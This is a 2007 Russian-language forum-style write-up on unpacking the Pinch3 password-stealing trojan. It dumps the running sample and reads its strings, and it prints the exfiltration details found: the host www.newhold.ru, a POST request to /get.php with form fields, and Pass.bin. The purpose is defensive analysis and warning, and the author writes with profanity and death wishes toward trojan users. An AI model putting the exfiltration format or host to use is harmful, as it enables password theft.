Реверсим пинч3 за 30 секунд (По мотивам фильма угнать за 60 секунд :))
 

Инструменты
Виртуальная машина
PEtools
hiew или любой другой тулз схожего ноправления.

Предистория
опять форум Злой.Орк наши дни... Какойто ойсикю нооркоман (но пример mp5) запустил у сибя пинч и лешился всех пасов.. в результате с его ойсикю начили распространять пинч его друзьям (кучке других ойсикю нооркоманов)... чтобы предупредить их mp5 создал постенг http:\\forum.zloy.org\showthread.php\p=285038#post285038 ну или где-то там...


GO GO GO!

сканим файл
May be Pklite Header Version %v6.^%v2 [extra > 0 - %v5 *
хрень какаято сразу видно %)

смотрим точку входа...
EP Section .RPCrypt
напоминает извесный "персональный криптор" RCrypt если ксть сигны то можно определить кому был продан данный билд и установить личность кедалы... но мне похуй пусть эти ойсекю нооркоманы наебывают друг-друга и считают что "трояны это не блек" вероятно этих кедисов не изменить...
запускаем файл трояна и делаем дамп в петулз затем открываем дамп в хювере и скролим вниз до
0000A019 | www.newhold.ru
0000A028 | POST /get.php HTTP/1.0
0000A040 | Host: %s
0000A04A | %s-Type: application/x-www-form-urlencoded
0000A076 | %s-Length: %u
0000A087 | a=you&b=Reports&d=%s&c=
0000A09F | Pass.bin

все определили гейт куда уходят пасы осталось определить на кого зареган сайтос но это уже не наши заботы...
смотрим в автозагрузку... там чисто...трой на 1 раз :\

Заключение:
Уважаемые кедалы троянщеги (когда уже вы все сдохните) вы уже заи**ле чесное слово! смотрите мы (элита ондеграунда) найдем время на вас в скором будующем и вам придецо пожелеть что вы юзаете гавнопенч и гавноксенч...
вобщем мы вас предупредиле...
для всех остальных: вот вы и научились распаковывать пенч3 в динамеке (невзирая на супер криптор) и совершено не юзая ксор нодеюсь вы ослзнали что трояны это фу! и некогда не будите их песать иле юзать...
за сим прощаемся до новых встрч...

© 2007 Red Bar0n[tPORt]